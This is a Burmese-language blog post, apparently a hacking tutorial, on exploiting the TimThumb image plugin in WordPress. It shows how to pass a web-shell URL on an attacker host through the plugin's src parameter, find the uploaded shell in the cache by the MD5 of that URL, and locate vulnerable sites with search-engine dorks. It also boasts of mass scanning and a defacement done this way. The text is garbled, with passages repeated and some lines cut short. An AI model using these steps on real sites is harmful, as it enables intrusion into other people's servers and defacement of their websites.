WP ရဲ ႔ Zero Day ဆိုျပီး အြန္လိုင္းမွာ အုပ္ေအာ္ ေသာင္းနင္းျဖစ္သြားတဲ့ Plugin ေလးအေၾကာင္း နည္းနည္းေျပာရေအာင္..။
ဒီ Hacking Tech: က ေပၚလာတာ လပိုင္းပဲရွိေသးတယ္ဗ် ျမန္မာျပည္မွာေတာင္ လူသိပ္မသိလွေသးဘူး..။ လက္ခ်ိဳးေရလို႔ရတယ္ သိတဲ့လူ…။
ေပါက္သြားတဲ့ Plugin ကေတာ့ timthumb.php ပါ timthumb ဟာ Photo ေတြကို ခ်ံဳ ႔ ခ်ဲ ႔လုပ္ရာမွာ အလြန္အသံုး၀င္တဲ့ Plugin တစ္ခုျဖစ္ပါတယ္ ဒါ့အျပင္ သူဟာ တျခား URL ကေန Photo ေတြကိုပါ လွမ္းယူႏိုင္ပါေသးတယ္ ဒီေနရာမွာေပါက္တာပါပဲ သူက တျခားလင့္ခ္
ေနရာက ပံုေတြယူမယ္ဆိုရင္ www.target.com/…
/timthumb.php?src=www.photosite.com/photo.php ဆိုျပီး သြားသဗ် အဲ့ဒီ့ src= ေနာက္မွာ Shell Link ကိုသြားထည့္လိုက္မယ္ဗ် ကဲ www.target.com/…/timthumb.php?src=www.hacker.com/shell.php
ေပါ့ ဒါဆိုလည္းသူက Shell ၾကီးကို Upload ၾကိတ္သြားမွာပဲ အဲ့ဒီ့အခါက် ကၽြန္ေတာ္တို႔က ေအးေအးေဆးေဆးသြား ေကာက္သံုးရံုပဲ အဲ့ဒီ့ Shell Link ကို ဘယ္လို ယူရမလဲဆိုေတာ့ shell.php Link ကို MD5 Change ခ်ရမယ္ဗ် www.hacker.com/shell.php ဆိုရင္
3434FF35A3614422F97F13251661A8
အင္း ဒါဆို www.target.com/…/cach/
သူက Theme က Plugin မွာ ေပါက္တဲ့အတြက္ thumb ရွိရာ Directory ကိုသြားရာမွာ Theme ေပၚမူတည္ျပီးသြားရပါ့မယ္ ဥပမာ www.target.com ရဲ ႔ Theme ဟာ Fordreporter က ဆြဲရင္ fordreporter/scripts/
ဥပမာ www.target.com/fordreporter/
ဆိုျပီးသြားရပါ့မယ္
Dork ရွာရင္လည္း ထိုနည္းလည္းေကာင္းပါပဲ Theme ေပၚမူတည္ျပီး inurl သို႔ allinurl နဲ႔တြဲျပီး inurl:fordreporter/scripts/
ဒီလို Theme နဲ႔ Thumbe Directory ကိုတြဲျပီး ရွာဖို႔ကိုေတာ့ ဒီမွာ သြားၾကည့္ပါ
ဒီ Plugin ဘယ္ေလာက္ေပါက္လဲဆို ဒီဟာကိုၾကည့္ၾကည့္ပါ.။ ဒါ ကၽြန္ေတာ္ ့အကိုတစ္ေယာက္ IRC ကေန Search Engine သံုးဆယ္ေက်ာ္ကို အသံုးျပဳျပီး Scan ဖတ္ထားတာပါ ဆယ္မိနစ္ကို ဆယ္ခုေလာက္ရပါတယ္ ဟီး ေပ်ာ္စရာၾကီး
[timthumb]
ေအာက္ကဟာကေတာ့ အဲ့ဒီ့ Vuln ကို အသံုးျပဳျပီး Deface လုပ္ထားတာပါ
[Capture]
ေအာ္ Countermeasure လားလြယ္ပါတယ္ ဒီ Vuln ဟာ thumb 2.0 ေအာက္ကဟာေတြပဲ ေပါက္တာျဖစ္လို႔ ဒီေနရာ ကေန Code ေတြယူျပီး ျပင္လိုက္ပါ :-P
PS : WP မွာ Timthumb ေပါက္မေပါက္စစ္တဲ့ Plugin ရွိပါတယ္
http://ghostarea.net/
WP ရဲ ႔ Zero Day ဆိုျပီး အြန္လိုင္းမွာ အုပ္ေအာ္ ေသာင္းနင္းျဖစ္သြားတဲ့ Plugin ေလးအေၾကာင္း နည္းနည္းေျပာရေအာင္..။
ဒီ Hacking Tech: က ေပၚလာတာ လပိုင္းပဲရွိေသးတယ္ဗ် ျမန္မာျပည္မွာေတာင္ လူသိပ္မသိလွေသးဘူး..။ လက္ခ်ိဳးေရလို႔ရတယ္ သိတဲ့လူ…။
ေပါက္သြားတဲ့ Plugin ကေတာ့ timthumb.php ပါ timthumb ဟာ Photo ေတြကို ခ်ံဳ ႔ ခ်ဲ ႔လုပ္ရာမွာ အလြန္အသံုး၀င္တဲ့ Plugin တစ္ခုျဖစ္ပါတယ္ ဒါ့အျပင္ သူဟာ တျခား URL ကေန Photo ေတြကိုပါ လွမ္းယူႏိုင္ပါေသးတယ္ ဒီေနရာမွာေပါက္တာပါပဲ သူက တျခားလင့္ခ္
ေနရာက ပံုေတြယူမယ္ဆိုရင္ www.target.com/…
/timthumb.php?src=www.photosite.com/photo.php ဆိုျပီး သြားသဗ် အဲ့ဒီ့ src= ေနာက္မွာ Shell Link ကိုသြားထည့္လိုက္မယ္ဗ် ကဲ www.target.com/…/timthumb.php?src=www.hacker.com/shell.php
ဒီ Hacking Tech: က ေပၚလာတာ လပိုင္းပဲရွိေသးတယ္ဗ် ျမန္မာျပည္မွာေတာင္ လူသိပ္မသိလွေသးဘူး..။ လက္ခ်ိဳးေရလို႔ရတယ္ သိတဲ့လူ…။
ေပါက္သြားတဲ့ Plugin ကေတာ့ timthumb.php ပါ timthumb ဟာ Photo ေတြကို ခ်ံဳ ႔ ခ်ဲ ႔လုပ္ရာမွာ အလြန္အသံုး၀င္တဲ့ Plugin တစ္ခုျဖစ္ပါတယ္ ဒါ့အျပင္ သူဟာ တျခား URL ကေန Photo ေတြကိုပါ လွမ္းယူႏိုင္ပါေသးတယ္ ဒီေနရာမွာေပါက္တာပါပဲ သူက တျခားလင့္ခ္
ေနရာက ပံုေတြယူမယ္ဆိုရင္ www.target.com/…
/timthumb.php?src=www.photosite.com/photo.php ဆိုျပီး သြားသဗ် အဲ့ဒီ့ src= ေနာက္မွာ Shell Link ကိုသြားထည့္လိုက္မယ္ဗ် ကဲ www.target.com/…/timthumb.php?src=www.hacker.com/shell.php
ေပါ့ ဒါဆိုလည္းသူက Shell ၾကီးကို Upload ၾကိတ္သြားမွာပဲ အဲ့ဒီ့အခါက် ကၽြန္ေတာ္တို႔က ေအးေအးေဆးေဆးသြား ေကာက္သံုးရံုပဲ အဲ့ဒီ့ Shell Link ကို ဘယ္လို ယူရမလဲဆိုေတာ့ shell.php Link ကို MD5 Change ခ်ရမယ္ဗ် www.hacker.com/shell.php ဆိုရင္
3434FF35A3614422F97F13251661A8
အင္း ဒါဆို www.target.com/…/cach/
သူက Theme က Plugin မွာ ေပါက္တဲ့အတြက္ thumb ရွိရာ Directory ကိုသြားရာမွာ Theme ေပၚမူတည္ျပီးသြားရပါ့မယ္ ဥပမာ www.target.com ရဲ ႔ Theme ဟာ Fordreporter က ဆြဲရင္ fordreporter/scripts/
ဥပမာ www.target.com/fordreporter/
ဆိုျပီးသြားရပါ့မယ္
Dork ရွာရင္လည္း ထိုနည္းလည္းေကာင္းပါပဲ Theme ေပၚမူတည္ျပီး inurl သို႔ allinurl နဲ႔တြဲျပီး inurl:fordreporter/scripts/
ဒီလို Theme နဲ႔ Thumbe Directory ကိုတြဲျပီး ရွာဖို႔ကိုေတာ့ ဒီမွာ သြားၾကည့္ပါ
ဒီ Plugin ဘယ္ေလာက္ေပါက္လဲဆို ဒီဟာကိုၾကည့္ၾကည့္ပါ.။ ဒါ ကၽြန္ေတာ္ ့အကိုတစ္ေယာက္ IRC ကေန Search Engine သံုးဆယ္ေက်ာ္ကို အသံုးျပဳျပီး Scan ဖတ္ထားတာပါ ဆယ္မိနစ္ကို ဆယ္ခုေလာက္ရပါတယ္ ဟီး ေပ်ာ္စရာၾကီး
[timthumb]
ေအာက္ကဟာကေတာ့ အဲ့ဒီ့ Vuln ကို အသံုးျပဳျပီး Deface လုပ္ထားတာပါ
[Capture]
ေအာ္ Countermeasure လားလြယ္ပါတယ္ ဒီ Vuln ဟာ thumb 2.0 ေအာက္ကဟာေတြပဲ ေပါက္တာျဖစ္လို႔ ဒီေနရာ ကေန Code ေတြယူျပီး ျပင္လိုက္ပါ :-P
PS : WP မွာ Timthumb ေပါက္မေပါက္စစ္တဲ့ Plugin ရွိပါတယ္
http://ghostarea.net/
3434FF35A3614422F97F13251661A8
အင္း ဒါဆို www.target.com/…/cach/
သူက Theme က Plugin မွာ ေပါက္တဲ့အတြက္ thumb ရွိရာ Directory ကိုသြားရာမွာ Theme ေပၚမူတည္ျပီးသြားရပါ့မယ္ ဥပမာ www.target.com ရဲ ႔ Theme ဟာ Fordreporter က ဆြဲရင္ fordreporter/scripts/
ဥပမာ www.target.com/fordreporter/
ဆိုျပီးသြားရပါ့မယ္
Dork ရွာရင္လည္း ထိုနည္းလည္းေကာင္းပါပဲ Theme ေပၚမူတည္ျပီး inurl သို႔ allinurl နဲ႔တြဲျပီး inurl:fordreporter/scripts/
ဒီလို Theme နဲ႔ Thumbe Directory ကိုတြဲျပီး ရွာဖို႔ကိုေတာ့ ဒီမွာ သြားၾကည့္ပါ
ဒီ Plugin ဘယ္ေလာက္ေပါက္လဲဆို ဒီဟာကိုၾကည့္ၾကည့္ပါ.။ ဒါ ကၽြန္ေတာ္ ့အကိုတစ္ေယာက္ IRC ကေန Search Engine သံုးဆယ္ေက်ာ္ကို အသံုးျပဳျပီး Scan ဖတ္ထားတာပါ ဆယ္မိနစ္ကို ဆယ္ခုေလာက္ရပါတယ္ ဟီး ေပ်ာ္စရာၾကီး
[timthumb]
ေအာက္ကဟာကေတာ့ အဲ့ဒီ့ Vuln ကို အသံုးျပဳျပီး Deface လုပ္ထားတာပါ
[Capture]
ေအာ္ Countermeasure လားလြယ္ပါတယ္ ဒီ Vuln ဟာ thumb 2.0 ေအာက္ကဟာေတြပဲ ေပါက္တာျဖစ္လို႔ ဒီေနရာ ကေန Code ေတြယူျပီး ျပင္လိုက္ပါ :-P
PS : WP မွာ Timthumb ေပါက္မေပါက္စစ္တဲ့ Plugin ရွိပါတယ္
http://ghostarea.net/
![WP ရဲ ႔ Zero Day ဆိုျပီး အြန္လိုင္းမွာ အုပ္ေအာ္ ေသာင္းနင္းျဖစ္သြားတဲ့ Plugin ေလးအေၾကာင္း နည္းနည္းေျပာရေအာင္..။ ဒီ Hacking Tech: က ေပၚလာတာ လပိုင္းပဲရွိေသးတယ္ဗ် ျမန္မာျပည္မွာေတာင္ လူသိပ္မသိလွေသးဘူး..။ လက္ခ်ိဳးေရလို႔ရတယ္ သိတဲ့လူ…။ ေပါက္သြားတဲ့ Plugin ကေတာ့ timthumb.php ပါ timthumb ဟာ Photo ေတြကို ခ်ံဳ ႔ ခ်ဲ ႔လုပ္ရာမွာ အလြန္အသံုး၀င္တဲ့ Plugin တစ္ခုျဖစ္ပါတယ္ ဒါ့အျပင္ သူဟာ တျခား URL ကေန Photo ေတြကိုပါ လွမ္းယူႏိုင္ပါေသးတယ္ ဒီေနရာမွာေပါက္တာပါပဲ သူက တျခားလင့္ခ္ ေနရာက ပံုေတြယူမယ္ဆိုရင္ www.target.com/…/timthumb.php?src=www.photosite.com/photo.php ဆိုျပီး သြားသဗ် အဲ့ဒီ့ src= ေနာက္မွာ Shell Link ကိုသြားထည့္လိုက္မယ္ဗ် ကဲ www.target.com/…/timthumb.php?src=www.hacker.com/shell.php ေပါ့ ဒါဆိုလည္းသူက Shell ၾကီးကို Upload ၾကိတ္သြားမွာပဲ အဲ့ဒီ့အခါက် ကၽြန္ေတာ္တို႔က ေအးေအးေဆးေဆးသြား ေကာက္သံုးရံုပဲ အဲ့ဒီ့ Shell Link ကို ဘယ္လို ယူရမလဲဆိုေတာ့ shell.php Link ကို MD5 Change ခ်ရမယ္ဗ် www.hacker.com/shell.php ဆိုရင္ 3434FF35A3614422F97F13251661A890 ေပါ့ဗ်ာ အင္း ဒါဆို www.target.com/…/cach/src=3434FF35A3614422F97F13251661A890.php ကိုသြားၾကည့္လိုက္ရင္ ကၽြန္ေတာ္တို႔ တင္ထားတဲ့ SHell ၾကီးတင္လာပါမယ္ ကဲ ေပ်ာ္စရာၾကီးေနာ္ သူက Theme က Plugin မွာ ေပါက္တဲ့အတြက္ thumb ရွိရာ Directory ကိုသြားရာမွာ Theme ေပၚမူတည္ျပီးသြားရပါ့မယ္ ဥပမာ www.target.com ရဲ ႔ Theme ဟာ Fordreporter က ဆြဲရင္ fordreporter/scripts/thumb.php နဲ႔သြားရပါ့မယ္ ဥပမာ www.target.com/fordreporter/scripts/thumb.php ေပါ့ဗ်ာ Upload လုပ္ခ်င္ရင္ www.target.com/fordreporter/scripts/thumb.php?src=www.hacker.com/sh... Shell ကိုသြားၾကည့္ရင္ www.target.com/fordreporter/scripts/cache/src=3434FF35A3614422F97F1... ဆိုျပီးသြားရပါ့မယ္ Dork ရွာရင္လည္း ထိုနည္းလည္းေကာင္းပါပဲ Theme ေပၚမူတည္ျပီး inurl သို႔ allinurl နဲ႔တြဲျပီး inurl:fordreporter/scripts/thumb.php ဆိုျပီးရွာရပါ့မယ္ ဒီလို Theme နဲ႔ Thumbe Directory ကိုတြဲျပီး ရွာဖို႔ကိုေတာ့ ဒီမွာ သြားၾကည့္ပါ ဒီ Plugin ဘယ္ေလာက္ေပါက္လဲဆို ဒီဟာကိုၾကည့္ၾကည့္ပါ.။ ဒါ ကၽြန္ေတာ္ ့အကိုတစ္ေယာက္ IRC ကေန Search Engine သံုးဆယ္ေက်ာ္ကို အသံုးျပဳျပီး Scan ဖတ္ထားတာပါ ဆယ္မိနစ္ကို ဆယ္ခုေလာက္ရပါတယ္ ဟီး ေပ်ာ္စရာၾကီး [timthumb] ေအာက္ကဟာကေတာ့ အဲ့ဒီ့ Vuln ကို အသံုးျပဳျပီး Deface လုပ္ထားတာပါ [Capture] ေအာ္ Countermeasure လားလြယ္ပါတယ္ ဒီ Vuln ဟာ thumb 2.0 ေအာက္ကဟာေတြပဲ ေပါက္တာျဖစ္လို႔ ဒီေနရာ ကေန Code ေတြယူျပီး ျပင္လိုက္ပါ :-P PS : WP မွာ Timthumb ေပါက္မေပါက္စစ္တဲ့ Plugin ရွိပါတယ္ http://ghostarea.net](https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-ash3/s480x480/558225_122697737876816_823030201_n.jpg)
No comments:
Post a Comment